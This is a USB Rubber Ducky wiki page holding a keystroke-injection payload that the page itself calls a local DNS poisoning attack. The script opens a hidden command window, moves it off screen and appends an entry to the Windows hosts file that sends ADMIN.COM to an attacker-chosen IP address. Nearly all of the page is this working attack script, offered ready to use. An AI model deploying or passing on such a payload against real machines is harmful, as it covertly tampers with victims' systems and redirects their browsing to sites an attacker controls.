forked from keland/USB-Rubber-Ducky
-
Notifications
You must be signed in to change notification settings - Fork 86
Payload local dns poisoning
overwraith edited this page Jan 22, 2013
·
2 revisions
The following is a local DNS poisoning attack that changes a hosts 'host' file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.
REM Author:ashbreeze96 and overwraith
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER